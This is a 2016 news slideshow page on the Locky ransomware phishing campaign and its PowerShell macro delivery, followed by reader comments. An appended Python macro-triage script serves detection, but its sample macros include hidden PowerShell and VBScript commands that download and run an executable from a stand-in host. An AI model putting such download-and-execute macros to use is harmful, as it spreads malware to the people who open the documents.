4/9/2016
08:00 AM
Steve Zurier
The 8 Most Convincing Phishing Schemes Of 2016

The year is young and high-profile phishing attacks keep coming seemingly every week. Here are eight reasons why security pros have to get serious about combating phishing.
2 of 9

Locky

On February 16 of this year, PhishMe's intelligence team identified a number of significantly large sets of emails that delivered Word documents containing macro scripts used to download malware. PhishMe says this is a common malware delivery technique that has been used by groups delivering the Dridex Trojan.

But this encryption ransomware was something new, referring to itself as Locky. One important difference was that it broke from the exclusive use of Visual Basic scripting. Instead, Locky used a PowerShell script to download and execute the malware.

Palo Alto Networks reports that more than 400,000 endpoints around the world were affected by Locky in a matter of hours.

While there are clear differences, PhishMe adds that the similarity of the messages and the OfficeMacro documents used to deliver Locky and those used to deliver Dridex is striking. Even the payload URLs were constructed in a way that resembles the naming convention used to deliver Dridex.
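As an added defender-side illustration (not code from the page, PhishMe or Palo Alto Networks): a small Python triage routine over extracted macro source text that flags the auto-execute, download and launch pattern and records whether the download stage is handed to PowerShell, the difference the article draws between Locky and Dridex-style macros. The sample macros and the example.invalid URLs are constructed for the example.

```python
import re

# Constructed VBA sources, as a macro-extraction tool would emit them (not from the page).
BENIGN_MACRO = """Sub FormatReport()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub"""

POWERSHELL_MACRO = """Sub Document_Open()
    Set sh = CreateObject("WScript.Shell")
    sh.Run "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/x','x.exe'); Start-Process 'x.exe'", 0
End Sub"""

VBSCRIPT_MACRO = """Sub AutoOpen()
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "GET", "http://example.invalid/y", False
    Set strm = CreateObject("ADODB.Stream")
    Shell "y.exe", vbHide
End Sub"""

# One case-insensitive regex per indicator class (VBA itself is case-insensitive).
INDICATORS = {
    "auto_exec": r"\b(AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b",
    "download": r"DownloadFile|DownloadString|Net\.WebClient|MSXML2\.XMLHTTP|URLDownloadToFile|Invoke-WebRequest",
    "launcher": r"WScript\.Shell|\bShell\b|Start-Process|Invoke-Expression|\bIEX\b",
    "powershell": r"powershell|-EncodedCommand|-enc\b|-w(indowstyle)?\s+hidden",
    "file_write": r"ADODB\.Stream|SaveToFile|For\s+Binary",
}

def assess_macro(src: str) -> dict:
    """Classify one macro's source; returns the indicator hits plus a verdict and stage."""
    hits = {name: bool(re.search(pat, src, re.I)) for name, pat in INDICATORS.items()}
    if hits["auto_exec"] and hits["download"] and hits["launcher"]:
        # Fires on open, fetches from the network and runs something: a downloader.
        hits["verdict"] = "download-and-execute"
        # The article's distinction: Dridex-style macros stayed in VBA/VBScript,
        # Locky's handed the download-and-run step to PowerShell.
        hits["stage"] = "powershell" if hits["powershell"] else "vbscript-only"
    elif hits["auto_exec"] and (hits["download"] or hits["launcher"]):
        hits["verdict"] = "suspicious"
        hits["stage"] = ""
    else:
        hits["verdict"] = "benign"
        hits["stage"] = ""
    return hits

if __name__ == "__main__":
    for name, src in [("benign", BENIGN_MACRO), ("powershell", POWERSHELL_MACRO), ("vbscript", VBSCRIPT_MACRO)]:
        r = assess_macro(src)
        print(f"{name:10s} verdict={r['verdict']:22s} stage={r['stage']}")
```

Feed it the output of a macro extractor rather than the raw document; the indicator lists are deliberately short and should be extended from your own sandbox observations.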

Image Source: PhishMe, Dark Reading

Comments
nathanwburke
User Rank: Author
4/13/2016 | 6:17:55 AM
Re: These problems were all preventable
Security awareness training can help, but that is also just one piece of a comprehensive security plan that includes the triumvirate of People, Process and Technology. Security awareness training can help with the People component, making employees more cognizant of the low-level, commodity attacks that use emails with attachments and links to compromised sites.

However, this only applies to the obvious. Don't download and run applications from attachments. Don't click links in emails from people you don't know. The problem is that many attacks are more sophisticated. In some cases, the phishing attack comes from a compromised email address using language that mimics the hacked sender. In those cases, all of the awareness training available will likely fail.

Creating a Process for flagging potentially malicious activity and quickly removing any threat organization-wide is key to reducing risk of threats introduced accidentally (despite awareness training). Having Technology in place to identify and remediate obvious threats is essential to keeping this process timely and scalable.

Awareness training is important, but simply telling people not to do the obvious isn't enough anymore.
Dan Euritt
User Rank: Apprentice
4/11/2016 | 10:39:10 AM
These problems were all preventable
All companies should be conducting awareness training on these issues, and this article looks like a great place to start. Thanks for posting it up.